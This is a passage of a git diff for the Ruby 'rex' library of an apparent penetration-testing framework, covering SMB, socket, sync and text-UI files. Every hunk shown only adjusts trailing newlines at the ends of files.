b/lib/rex/proto/http/server.rb.ut.rb index d183bda64c..3ecbdf5b69 100644 --- a/lib/rex/proto/http/server.rb.ut.rb +++ b/lib/rex/proto/http/server.rb.ut.rb @@ -76,4 +76,4 @@ protected attr_accessor :srv -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb.rb b/lib/rex/proto/smb.rb index 29c4ce002c..2787024d56 100644 --- a/lib/rex/proto/smb.rb +++ b/lib/rex/proto/smb.rb @@ -4,4 +4,4 @@ require 'rex/proto/smb/evasions' require 'rex/proto/smb/crypt' require 'rex/proto/smb/utils' require 'rex/proto/smb/client' -require 'rex/proto/smb/simpleclient' +require 'rex/proto/smb/simpleclient' \ No newline at end of file diff --git a/lib/rex/proto/smb.rb.ts.rb b/lib/rex/proto/smb.rb.ts.rb index cc67bcaa10..b777cd6c18 100644 --- a/lib/rex/proto/smb.rb.ts.rb +++ b/lib/rex/proto/smb.rb.ts.rb @@ -5,4 +5,4 @@ require 'rex/proto/smb/client.rb.ut.rb' require 'rex/proto/smb/constants.rb.ut.rb' require 'rex/proto/smb/crypt.rb.ut.rb' require 'rex/proto/smb/simpleclient.rb.ut.rb' -require 'rex/proto/smb/utils.rb.ut.rb' +require 'rex/proto/smb/utils.rb.ut.rb' \ No newline at end of file diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index 63fb7b66bc..e8306fa943 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1676,4 +1676,4 @@ EVADE = Rex::Proto::SMB::Evasions end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/client.rb.ut.rb b/lib/rex/proto/smb/client.rb.ut.rb index 34c7ff4bab..d81a7aa63f 100644 --- a/lib/rex/proto/smb/client.rb.ut.rb +++ b/lib/rex/proto/smb/client.rb.ut.rb @@ -219,4 +219,4 @@ class Rex::Proto::SMB::Client::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb index 791f27fa93..c16f78250a 100644 --- a/lib/rex/proto/smb/constants.rb +++ b/lib/rex/proto/smb/constants.rb @@ -1042,4 +1042,4 @@ NEGOTIATE_56 = 0x80000000 # 56-bit encryption supported end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/constants.rb.ut.rb b/lib/rex/proto/smb/constants.rb.ut.rb index d0ba23e877..9f7809765e 100644 --- a/lib/rex/proto/smb/constants.rb.ut.rb +++ b/lib/rex/proto/smb/constants.rb.ut.rb @@ -15,4 +15,4 @@ class Rex::Proto::SMB::Constants::UnitTest < Test::Unit::TestCase assert_equal(Klass::NT_TRANSACT_QUERY_SECURITY_DESC, 0x06) end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/crypt.rb b/lib/rex/proto/smb/crypt.rb index d382c87067..9e49354360 100644 --- a/lib/rex/proto/smb/crypt.rb +++ b/lib/rex/proto/smb/crypt.rb @@ -59,4 +59,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/crypt.rb.ut.rb b/lib/rex/proto/smb/crypt.rb.ut.rb index af72e2bffc..7f74279d8e 100644 --- a/lib/rex/proto/smb/crypt.rb.ut.rb +++ b/lib/rex/proto/smb/crypt.rb.ut.rb @@ -17,4 +17,4 @@ class Rex::Proto::SMB::Crypt::UnitTest < Test::Unit::TestCase assert_equal("\xc2\x48\xcf\x61\x65\xfe\x55\xef\xac\xa0\x30\x09\x66\xdc\x37\x96\x04\x6b\x9c\x0b\xb4\xa5\x2e\x27", Klass.lanman_des(pass, chal), 'lanman_des') assert_equal("\x8d\x04\x18\x58\xf0\x78\xcc\xfa\x15\x60\xa4\x61\x76\x90\xe5\x51\x84\xfd\x70\xec\x7f\x23\xb7\xf9", Klass.ntlm_md4(pass, chal), 'ntlm_md4') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/evasions.rb b/lib/rex/proto/smb/evasions.rb index cc337a7b22..e50e1c7533 100644 --- a/lib/rex/proto/smb/evasions.rb +++ b/lib/rex/proto/smb/evasions.rb @@ -62,6 +62,4 @@ EVASION_MAX = 3 end end end -end - - +end \ No newline at end of file diff --git a/lib/rex/proto/smb/exceptions.rb b/lib/rex/proto/smb/exceptions.rb index ef8265bb64..4c180e4356 100644 --- a/lib/rex/proto/smb/exceptions.rb +++ b/lib/rex/proto/smb/exceptions.rb @@ -842,6 +842,4 @@ end end end end -end - - +end \ No newline at end of file diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb index a1e68ddb94..b4ba4daa08 100644 --- a/lib/rex/proto/smb/simpleclient.rb +++ b/lib/rex/proto/smb/simpleclient.rb @@ -271,4 +271,4 @@ attr_accessor :socket, :client, :direct, :shares, :last_share end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/simpleclient.rb.ut.rb b/lib/rex/proto/smb/simpleclient.rb.ut.rb index b14f3825c8..9f2147efea 100644 --- a/lib/rex/proto/smb/simpleclient.rb.ut.rb +++ b/lib/rex/proto/smb/simpleclient.rb.ut.rb @@ -124,4 +124,4 @@ class Rex::Proto::SMB::SimpleClient::UnitTest < Test::Unit::TestCase flunk('timeout') end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/utils.rb b/lib/rex/proto/smb/utils.rb index 419e05784b..ede7648fcf 100644 --- a/lib/rex/proto/smb/utils.rb +++ b/lib/rex/proto/smb/utils.rb @@ -511,4 +511,4 @@ CONST = Rex::Proto::SMB::Constants end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/smb/utils.rb.ut.rb b/lib/rex/proto/smb/utils.rb.ut.rb index 5b988e1f5e..971d9cbccc 100644 --- a/lib/rex/proto/smb/utils.rb.ut.rb +++ b/lib/rex/proto/smb/utils.rb.ut.rb @@ -17,4 +17,4 @@ class Rex::Proto::SMB::Utils::UnitTest < Test::Unit::TestCase assert_equal(Klass.nbname_encode(nbdecoded), nbencoded ) assert_equal(Klass.nbname_decode(nbencoded), nbdecoded ) end -end +end \ No newline at end of file diff --git a/lib/rex/proto/sunrpc.rb b/lib/rex/proto/sunrpc.rb index 40705e3218..4dea8075eb 100644 --- a/lib/rex/proto/sunrpc.rb +++ b/lib/rex/proto/sunrpc.rb @@ -1,2 +1,2 @@ require 'rex/proto/sunrpc/client' -require 'rex/proto/sunrpc/xdr' +require 'rex/proto/sunrpc/xdr' \ No newline at end of file diff --git a/lib/rex/proto/sunrpc/client.rb b/lib/rex/proto/sunrpc/client.rb index 60d5bed870..9b64cc9073 100644 --- a/lib/rex/proto/sunrpc/client.rb +++ b/lib/rex/proto/sunrpc/client.rb @@ -241,4 +241,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/sunrpc/xdr.rb b/lib/rex/proto/sunrpc/xdr.rb index 05f4095bb0..7c666e71f2 100644 --- a/lib/rex/proto/sunrpc/xdr.rb +++ b/lib/rex/proto/sunrpc/xdr.rb @@ -107,4 +107,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/script.rb b/lib/rex/script.rb index c3722ef8cb..acc82b98c7 100644 --- a/lib/rex/script.rb +++ b/lib/rex/script.rb @@ -37,4 +37,4 @@ module Script end -end +end \ No newline at end of file diff --git a/lib/rex/service.rb b/lib/rex/service.rb index acebd1e027..719163c729 100644 --- a/lib/rex/service.rb +++ b/lib/rex/service.rb @@ -45,4 +45,4 @@ module Service end -end +end \ No newline at end of file diff --git a/lib/rex/service_manager.rb b/lib/rex/service_manager.rb index e6e0b2c59f..3602a94937 100644 --- a/lib/rex/service_manager.rb +++ b/lib/rex/service_manager.rb @@ -138,4 +138,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/rex/service_manager.rb.ut.rb b/lib/rex/service_manager.rb.ut.rb index 605eee60b4..a72a08ea7b 100644 --- a/lib/rex/service_manager.rb.ut.rb +++ b/lib/rex/service_manager.rb.ut.rb @@ -29,4 +29,4 @@ class Rex::ServiceManager::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/rex/services/local_relay.rb b/lib/rex/services/local_relay.rb index f1d0d01195..4f9487743b 100644 --- a/lib/rex/services/local_relay.rb +++ b/lib/rex/services/local_relay.rb @@ -415,4 +415,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index f9d8d47a4f..9c619ffe70 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -479,4 +479,4 @@ end # SHUT_RDWR = ::Socket::SHUT_RDWR SHUT_RD = ::Socket::SHUT_RD -SHUT_WR = ::Socket::SHUT_WR +SHUT_WR = ::Socket::SHUT_WR \ No newline at end of file diff --git a/lib/rex/socket.rb.ut.rb b/lib/rex/socket.rb.ut.rb index 38926f9676..b457f27a27 100644 --- a/lib/rex/socket.rb.ut.rb +++ b/lib/rex/socket.rb.ut.rb @@ -83,4 +83,4 @@ class Rex::Socket::UnitTest < Test::Unit::TestCase assert_equal("255.255.0.0", Rex::Socket.bit2netmask(16)) end -end +end \ No newline at end of file diff --git a/lib/rex/socket/comm.rb b/lib/rex/socket/comm.rb index f6e05e157f..c15866c4f8 100644 --- a/lib/rex/socket/comm.rb +++ b/lib/rex/socket/comm.rb @@ -122,5 +122,4 @@ protected end end -end - +end \ No newline at end of file diff --git a/lib/rex/socket/comm/local.rb b/lib/rex/socket/comm/local.rb index c7d1af249e..b3c6c79570 100644 --- a/lib/rex/socket/comm/local.rb +++ b/lib/rex/socket/comm/local.rb @@ -320,4 +320,4 @@ class Rex::Socket::Comm::Local self.instance.each_event_handler(handler) end -end +end \ No newline at end of file diff --git a/lib/rex/socket/comm/local.rb.ut.rb b/lib/rex/socket/comm/local.rb.ut.rb index 92612e805f..ca20a6e3f1 100644 --- a/lib/rex/socket/comm/local.rb.ut.rb +++ b/lib/rex/socket/comm/local.rb.ut.rb @@ -72,4 +72,4 @@ class Rex::Socket::Comm::Local::UnitTest < Test::Unit::TestCase } end -end +end \ No newline at end of file diff --git a/lib/rex/socket/ip.rb b/lib/rex/socket/ip.rb index f011f533f8..448eeecbcf 100644 --- a/lib/rex/socket/ip.rb +++ b/lib/rex/socket/ip.rb @@ -144,4 +144,4 @@ module Rex::Socket::Ip return 'ip' end -end +end \ No newline at end of file diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb index e4d235c18f..8254d10623 100644 --- a/lib/rex/socket/parameters.rb +++ b/lib/rex/socket/parameters.rb @@ -297,4 +297,4 @@ class Rex::Socket::Parameters alias peeraddr peerhost alias localaddr localhost -end +end \ No newline at end of file diff --git a/lib/rex/socket/parameters.rb.ut.rb b/lib/rex/socket/parameters.rb.ut.rb index 59f50c518d..32d33f0cb8 100644 --- a/lib/rex/socket/parameters.rb.ut.rb +++ b/lib/rex/socket/parameters.rb.ut.rb @@ -48,4 +48,4 @@ class Rex::Socket::Parameters::UnitTest < Test::Unit::TestCase assert_equal(false, p.ssl, "default false ssl") end -end +end \ No newline at end of file diff --git a/lib/rex/socket/range_walker.rb b/lib/rex/socket/range_walker.rb index da5b0b99dd..67f1b2a24f 100644 --- a/lib/rex/socket/range_walker.rb +++ b/lib/rex/socket/range_walker.rb @@ -90,4 +90,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/socket/range_walker.rb.ut.rb b/lib/rex/socket/range_walker.rb.ut.rb index a73f20964d..f4d40f1148 100644 --- a/lib/rex/socket/range_walker.rb.ut.rb +++ b/lib/rex/socket/range_walker.rb.ut.rb @@ -52,4 +52,4 @@ class Rex::Socket::RangeWalker::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 0b35690215..a632d2c533 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -154,4 +154,4 @@ end return 'tcp-ssl' end -end +end \ No newline at end of file diff --git a/lib/rex/socket/ssl_tcp.rb.ut.rb b/lib/rex/socket/ssl_tcp.rb.ut.rb index d9aa9149af..1f3ea742ef 100644 --- a/lib/rex/socket/ssl_tcp.rb.ut.rb +++ b/lib/rex/socket/ssl_tcp.rb.ut.rb @@ -36,4 +36,4 @@ class Rex::Socket::SslTcp::UnitTest < Test::Unit::TestCase } end -end +end \ No newline at end of file diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb index 3264cdabac..059c2438af 100644 --- a/lib/rex/socket/ssl_tcp_server.rb +++ b/lib/rex/socket/ssl_tcp_server.rb @@ -93,4 +93,4 @@ module Rex::Socket::SslTcpServer end attr_accessor :sslctx -end +end \ No newline at end of file diff --git a/lib/rex/socket/ssl_tcp_server.rb.ut.rb b/lib/rex/socket/ssl_tcp_server.rb.ut.rb index bc57c350b4..c2a5a90295 100644 --- a/lib/rex/socket/ssl_tcp_server.rb.ut.rb +++ b/lib/rex/socket/ssl_tcp_server.rb.ut.rb @@ -48,4 +48,4 @@ class Rex::Socket::SslTcpServer::UnitTest < Test::Unit::TestCase threads.each { |aThread| aThread.join } end -end +end \ No newline at end of file diff --git a/lib/rex/socket/subnet_walker.rb b/lib/rex/socket/subnet_walker.rb index b342fb7fba..4d90128645 100644 --- a/lib/rex/socket/subnet_walker.rb +++ b/lib/rex/socket/subnet_walker.rb @@ -72,4 +72,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/socket/subnet_walker.rb.ut.rb b/lib/rex/socket/subnet_walker.rb.ut.rb index e8f61d7acc..1ddd83c834 100644 --- a/lib/rex/socket/subnet_walker.rb.ut.rb +++ b/lib/rex/socket/subnet_walker.rb.ut.rb @@ -25,4 +25,4 @@ class Rex::Socket::SubnetWalker::UnitTest < Test::Unit::TestCase assert_nil(s.next_ip) end -end +end \ No newline at end of file diff --git a/lib/rex/socket/switch_board.rb b/lib/rex/socket/switch_board.rb index 060f7755f1..74cd60f980 100644 --- a/lib/rex/socket/switch_board.rb +++ b/lib/rex/socket/switch_board.rb @@ -261,4 +261,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/socket/switch_board.rb.ut.rb b/lib/rex/socket/switch_board.rb.ut.rb index 1a797d6a65..8d89cd4eff 100644 --- a/lib/rex/socket/switch_board.rb.ut.rb +++ b/lib/rex/socket/switch_board.rb.ut.rb @@ -49,4 +49,4 @@ class Rex::Socket::SwitchBoard::UnitTest < Test::Unit::TestCase assert_nil(Klass.best_comm('1.2.3.7')) end -end +end \ No newline at end of file diff --git a/lib/rex/socket/tcp.rb b/lib/rex/socket/tcp.rb index d23e655296..02f7034d97 100644 --- a/lib/rex/socket/tcp.rb +++ b/lib/rex/socket/tcp.rb @@ -73,4 +73,4 @@ module Rex::Socket::Tcp return 'tcp' end -end +end \ No newline at end of file diff --git a/lib/rex/socket/tcp.rb.ut.rb b/lib/rex/socket/tcp.rb.ut.rb index e73403c129..1f15773732 100644 --- a/lib/rex/socket/tcp.rb.ut.rb +++ b/lib/rex/socket/tcp.rb.ut.rb @@ -61,4 +61,4 @@ class Rex::Socket::Tcp::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/rex/socket/tcp_server.rb b/lib/rex/socket/tcp_server.rb index 54a0d55424..3e9f970cec 100644 --- a/lib/rex/socket/tcp_server.rb +++ b/lib/rex/socket/tcp_server.rb @@ -57,4 +57,4 @@ module Rex::Socket::TcpServer t end -end +end \ No newline at end of file diff --git a/lib/rex/socket/tcp_server.rb.ut.rb b/lib/rex/socket/tcp_server.rb.ut.rb index 725e79db59..54a8289b00 100644 --- a/lib/rex/socket/tcp_server.rb.ut.rb +++ b/lib/rex/socket/tcp_server.rb.ut.rb @@ -41,4 +41,4 @@ class Rex::Socket::TcpServer::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/rex/socket/udp.rb b/lib/rex/socket/udp.rb index 9326fa928a..c54785e39c 100644 --- a/lib/rex/socket/udp.rb +++ b/lib/rex/socket/udp.rb @@ -142,4 +142,4 @@ module Rex::Socket::Udp return 'udp' end -end +end \ No newline at end of file diff --git a/lib/rex/socket/udp.rb.ut.rb b/lib/rex/socket/udp.rb.ut.rb index 2046fabac7..efc8804492 100644 --- a/lib/rex/socket/udp.rb.ut.rb +++ b/lib/rex/socket/udp.rb.ut.rb @@ -41,4 +41,4 @@ class Rex::Socket::Udp::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/rex/struct2.rb b/lib/rex/struct2.rb index cfc1c1ba88..e6bd971abf 100644 --- a/lib/rex/struct2.rb +++ b/lib/rex/struct2.rb @@ -2,4 +2,4 @@ # just a shim to load all of the Struct2 libraries -require 'rex/struct2/c_struct_template' +require 'rex/struct2/c_struct_template' \ No newline at end of file diff --git a/lib/rex/struct2/c_struct.rb b/lib/rex/struct2/c_struct.rb index d39367eb06..165ddfd659 100644 --- a/lib/rex/struct2/c_struct.rb +++ b/lib/rex/struct2/c_struct.rb @@ -178,4 +178,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/c_struct_template.rb b/lib/rex/struct2/c_struct_template.rb index 9a814f476b..fdac380310 100644 --- a/lib/rex/struct2/c_struct_template.rb +++ b/lib/rex/struct2/c_struct_template.rb @@ -36,4 +36,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/constant.rb b/lib/rex/struct2/constant.rb index b47a5521a2..90a75168d0 100644 --- a/lib/rex/struct2/constant.rb +++ b/lib/rex/struct2/constant.rb @@ -23,4 +23,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/element.rb b/lib/rex/struct2/element.rb index 216cdae739..d024a8454a 100644 --- a/lib/rex/struct2/element.rb +++ b/lib/rex/struct2/element.rb @@ -41,4 +41,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/generic.rb b/lib/rex/struct2/generic.rb index acf222c201..e93e81c2ad 100644 --- a/lib/rex/struct2/generic.rb +++ b/lib/rex/struct2/generic.rb @@ -69,4 +69,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/restraint.rb b/lib/rex/struct2/restraint.rb index 9826163ee7..5f3a00e7dc 100644 --- a/lib/rex/struct2/restraint.rb +++ b/lib/rex/struct2/restraint.rb @@ -51,4 +51,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/s_string.rb b/lib/rex/struct2/s_string.rb index 74493f07db..154e0b1a88 100644 --- a/lib/rex/struct2/s_string.rb +++ b/lib/rex/struct2/s_string.rb @@ -69,4 +69,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/struct2/s_struct.rb b/lib/rex/struct2/s_struct.rb index 688cbbc35f..61b9d98354 100644 --- a/lib/rex/struct2/s_struct.rb +++ b/lib/rex/struct2/s_struct.rb @@ -103,4 +103,4 @@ end # end Rex::Struct2 end -end +end \ No newline at end of file diff --git a/lib/rex/sync.rb b/lib/rex/sync.rb index c64f505cda..da212e9dc2 100644 --- a/lib/rex/sync.rb +++ b/lib/rex/sync.rb @@ -3,4 +3,4 @@ require 'rex/sync/thread_safe' require 'rex/sync/ref' require 'rex/sync/read_write_lock' -require 'rex/sync/event' +require 'rex/sync/event' \ No newline at end of file diff --git a/lib/rex/sync/event.rb b/lib/rex/sync/event.rb index bf439c92d6..587510bc31 100644 --- a/lib/rex/sync/event.rb +++ b/lib/rex/sync/event.rb @@ -82,4 +82,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/sync/read_write_lock.rb b/lib/rex/sync/read_write_lock.rb index eec3a65df5..fb6af4b637 100644 --- a/lib/rex/sync/read_write_lock.rb +++ b/lib/rex/sync/read_write_lock.rb @@ -172,4 +172,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/rex/sync/ref.rb b/lib/rex/sync/ref.rb index 1af98ab5e5..5269aad2f6 100644 --- a/lib/rex/sync/ref.rb +++ b/lib/rex/sync/ref.rb @@ -54,4 +54,4 @@ module Ref end end -end +end \ No newline at end of file diff --git a/lib/rex/sync/thread_safe.rb b/lib/rex/sync/thread_safe.rb index 5483720bb0..a81da81c2c 100644 --- a/lib/rex/sync/thread_safe.rb +++ b/lib/rex/sync/thread_safe.rb @@ -76,4 +76,4 @@ module ThreadSafe end -end +end \ No newline at end of file diff --git a/lib/rex/test.rb b/lib/rex/test.rb index 072b9383ee..794f4374d5 100644 --- a/lib/rex/test.rb +++ b/lib/rex/test.rb @@ -32,4 +32,4 @@ end Rex::Test.load() end -end +end \ No newline at end of file diff --git a/lib/rex/text.rb b/lib/rex/text.rb index ff80a04729..036e61fdb8 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1022,4 +1022,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/text.rb.ut.rb b/lib/rex/text.rb.ut.rb index 611d28963c..75e5352e57 100644 --- a/lib/rex/text.rb.ut.rb +++ b/lib/rex/text.rb.ut.rb @@ -164,4 +164,4 @@ class Rex::Text::UnitTest < Test::Unit::TestCase assert_equal("acbd18db4cc2f85cedef654fccc4a4d8", Rex::Text.md5('foo')) end -end +end \ No newline at end of file diff --git a/lib/rex/time.rb b/lib/rex/time.rb index 411d32facf..f7f66ba6f4 100644 --- a/lib/rex/time.rb +++ b/lib/rex/time.rb @@ -62,5 +62,4 @@ module ExtTime end -end - +end \ No newline at end of file diff --git a/lib/rex/transformer.rb b/lib/rex/transformer.rb index 58991fadf2..043e982700 100644 --- a/lib/rex/transformer.rb +++ b/lib/rex/transformer.rb @@ -112,4 +112,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/rex/transformer.rb.ut.rb b/lib/rex/transformer.rb.ut.rb index 151eed9ed7..fe09ee1b65 100644 --- a/lib/rex/transformer.rb.ut.rb +++ b/lib/rex/transformer.rb.ut.rb @@ -35,4 +35,4 @@ class Rex::Transformer::UnitTest < Test::Unit::TestCase assert_equal('onetwo', a[0], "invalid from_a conversion") end -end +end \ No newline at end of file diff --git a/lib/rex/ui.rb b/lib/rex/ui.rb index 4422e11018..ec1cb87091 100644 --- a/lib/rex/ui.rb +++ b/lib/rex/ui.rb @@ -18,4 +18,4 @@ require 'rex/ui/text/table' # Ui subscriber require 'rex/ui/subscriber' -require 'rex/ui/interactive' +require 'rex/ui/interactive' \ No newline at end of file diff --git a/lib/rex/ui/interactive.rb b/lib/rex/ui/interactive.rb index 6674be83f2..fcf96eff66 100644 --- a/lib/rex/ui/interactive.rb +++ b/lib/rex/ui/interactive.rb @@ -249,4 +249,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/output.rb b/lib/rex/ui/output.rb index 2158eea49c..a0597613f9 100644 --- a/lib/rex/ui/output.rb +++ b/lib/rex/ui/output.rb @@ -74,4 +74,4 @@ class Output end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/output/none.rb b/lib/rex/ui/output/none.rb index 14bb7a55bf..1b016b3f0f 100644 --- a/lib/rex/ui/output/none.rb +++ b/lib/rex/ui/output/none.rb @@ -15,4 +15,4 @@ class Output::None < Rex::Ui::Output end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/progress_tracker.rb b/lib/rex/ui/progress_tracker.rb index 9b1d886b25..bb3b6f50d7 100644 --- a/lib/rex/ui/progress_tracker.rb +++ b/lib/rex/ui/progress_tracker.rb @@ -93,4 +93,4 @@ class ProgressTracker end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/subscriber.rb b/lib/rex/ui/subscriber.rb index 491d9f6e54..20fd541744 100644 --- a/lib/rex/ui/subscriber.rb +++ b/lib/rex/ui/subscriber.rb @@ -136,4 +136,4 @@ module Subscriber end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb index 10ff63703e..fe7b8a5367 100644 --- a/lib/rex/ui/text/color.rb +++ b/lib/rex/ui/text/color.rb @@ -44,4 +44,4 @@ module Color end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/ui/text/color.rb.ut.rb b/lib/rex/ui/text/color.rb.ut.rb index 82c443f9fe..12b490caf1 100644 --- a/lib/rex/ui/text/color.rb.ut.rb +++ b/lib/rex/ui/text/color.rb.ut.rb @@ -15,4 +15,4 @@ class Rex::Ui::Text::Color::UnitTest < Test::Unit::TestCase assert_equal("\e[1;31mhey sup\e[0m", color) end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 5f0a6f7226..df2cf74743 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -361,4 +361,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/input.rb b/lib/rex/ui/text/input.rb index 374fe798e4..ebe82ae2f0 100644 --- a/lib/rex/ui/text/input.rb +++ b/lib/rex/ui/text/input.rb @@ -72,4 +72,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/input/buffer.rb b/lib/rex/ui/text/input/buffer.rb index 184a30b026..b4e4736a37 100644 --- a/lib/rex/ui/text/input/buffer.rb +++ b/lib/rex/ui/text/input/buffer.rb @@ -72,4 +72,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/input/readline.rb b/lib/rex/ui/text/input/readline.rb index 8d16918f78..0e4924d9a7 100644 --- a/lib/rex/ui/text/input/readline.rb +++ b/lib/rex/ui/text/input/readline.rb @@ -159,4 +159,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/input/socket.rb b/lib/rex/ui/text/input/socket.rb index 711b103118..4bdd6c6d75 100644 --- a/lib/rex/ui/text/input/socket.rb +++ b/lib/rex/ui/text/input/socket.rb @@ -88,4 +88,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/input/stdio.rb b/lib/rex/ui/text/input/stdio.rb index 42c8ca9c3a..51184b864a 100644 --- a/lib/rex/ui/text/input/stdio.rb +++ b/lib/rex/ui/text/input/stdio.rb @@ -42,4 +42,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb index 15f38be890..eb35889e36 100644 --- a/lib/rex/ui/text/irb_shell.rb +++ b/lib/rex/ui/text/irb_shell.rb @@ -52,4 +52,4 @@ class IrbShell end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/output.rb b/lib/rex/ui/text/output.rb index c6508cc3e9..71f29ce754 100644 --- a/lib/rex/ui/text/output.rb +++ b/lib/rex/ui/text/output.rb @@ -39,4 +39,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/output/buffer.rb b/lib/rex/ui/text/output/buffer.rb index d23c6ef649..e04a06f73b 100644 --- a/lib/rex/ui/text/output/buffer.rb +++ b/lib/rex/ui/text/output/buffer.rb @@ -47,4 +47,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/output/socket.rb b/lib/rex/ui/text/output/socket.rb index 5045c82d90..0cd523e9e0 100644 --- a/lib/rex/ui/text/output/socket.rb +++ b/lib/rex/ui/text/output/socket.rb @@ -28,4 +28,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/output/stdio.rb b/lib/rex/ui/text/output/stdio.rb index 77e9cb5798..76c095bc47 100644 --- a/lib/rex/ui/text/output/stdio.rb +++ b/lib/rex/ui/text/output/stdio.rb @@ -24,4 +24,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/progress_tracker.rb b/lib/rex/ui/text/progress_tracker.rb index bc861754ed..7a8b411bc9 100644 --- a/lib/rex/ui/text/progress_tracker.rb +++ b/lib/rex/ui/text/progress_tracker.rb @@ -53,4 +53,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/progress_tracker.rb.ut.rb b/lib/rex/ui/text/progress_tracker.rb.ut.rb index 8ac7109a9c..9334e022e6 100644 --- a/lib/rex/ui/text/progress_tracker.rb.ut.rb +++ b/lib/rex/ui/text/progress_tracker.rb.ut.rb @@ -31,4 +31,4 @@ class Rex::Ui::Text::ProgressTracker::UnitTest < Test::Unit::TestCase assert_equal("[-] fatal: bad\n", pt.abort("bad")) end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/shell.rb b/lib/rex/ui/text/shell.rb index 69b6d7a26b..b9cba24459 100644 --- a/lib/rex/ui/text/shell.rb +++ b/lib/rex/ui/text/shell.rb @@ -324,4 +324,4 @@ class PseudoShell end -end end end +end end end \ No newline at end of file diff --git a/lib/rex/ui/text/table.rb b/lib/rex/ui/text/table.rb index 79ef8d231b..c2adb012fa 100644 --- a/lib/rex/ui/text/table.rb +++ b/lib/rex/ui/text/table.rb @@ -237,4 +237,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/ui/text/table.rb.ut.rb b/lib/rex/ui/text/table.rb.ut.rb index 9d1d4f42de..87a95ed5d2 100644 --- a/lib/rex/ui/text/table.rb.ut.rb +++ b/lib/rex/ui/text/table.rb.ut.rb @@ -52,4 +52,4 @@ End assert_equal(tbl.to_s, dstr) end -end +end \ No newline at end of file diff --git a/lib/scruby.rb b/lib/scruby.rb index 5eb0b90ee6..40e68d44ac 100755 --- a/lib/scruby.rb +++ b/lib/scruby.rb @@ -130,5 +130,4 @@ if (__FILE__ == $0) end end until line == nil puts -end - +end \ No newline at end of file diff --git a/lib/scruby/conf.rb b/lib/scruby/conf.rb index cf6b570844..d2a41f386a 100755 --- a/lib/scruby/conf.rb +++ b/lib/scruby/conf.rb @@ -60,4 